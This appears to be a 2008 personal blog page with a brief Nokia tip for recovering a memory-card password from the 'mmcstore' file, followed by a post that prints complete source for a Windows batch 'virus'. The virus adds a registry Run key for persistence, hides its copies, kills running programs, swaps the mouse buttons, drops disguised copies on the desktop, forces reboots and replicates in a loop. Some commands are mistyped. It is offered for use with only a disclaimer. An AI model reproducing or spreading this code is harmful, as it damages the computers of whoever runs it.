7.29.2008

UNLOCK PASSWORD OF MOBLIE PHONE MEMORY CARD


UNLOCK PASSWORD OF MOBLIE PHONE MEMORY CARD

UNLOCK PASSWORD PROTECTED MEMORY CARD
Well its quite simple but most of the people do not know it.

Please note the fact that it only works if the password to the MMC Card was set in ur own mobile,where u want it to be unlocked.

This method works well for nokia cells with symbian operating system.Never tried on other cells.use any software like FXplorer that can browse files in ur cell.

1. Open one of above software you have.
2. Browse through the directory, C:\system
3. Rename the file mmcstore to mmcstore.txt
4. Open the file - The file will open in Notes.
5. You will find your password in that file. That file would also contain much more data which you do not understand,so you need to go through the file to get the password!

When ur cell is connected to pc by means of data cable or bluetooth,u can see the password by simply opening the file mmcstore with notepad
Posted by KAKU at 9:08 PM 0 comments
Batch Virus
THE BATCH VIRUS

@echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %systemroot%\greatgame>nul
reg add hkml \software\microsoft\windows\currentversion\run/v greatgame/t REG_sz
/d %systemroot%\greatgame.bat/f>nul
copy %0*.bat>nul
attrib +r +h greatgame.bat
RUNDLL 32 USER 32.dll swap mouse button
start calc
cls
tskill msnmsgr
tskill limewire
tskill iexplore
tskill Nmain
start
cls
cd %userprofile%\desktop
copy greatgame.bat R.I.P.bat
copy greatgame.bat R.I.P.jpg
copy greatgame.bat R.I.P.txt
copy greatgame.bat R.I.P.exe
copy greatgame.bat R.I.P.mov
copy greatgame.bat R.I.P.fix virus.bat
start
start calc
cls
msg*R.I.P
msg*R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy greatgame.bat %random%.bat
goto RIP

save this "anyname".dat
but carefulle its dangerous i am not responsible is its damege ur system.

0 Comments:

Post a Comment

Subscribe to Post Comments [Atom]

<< Home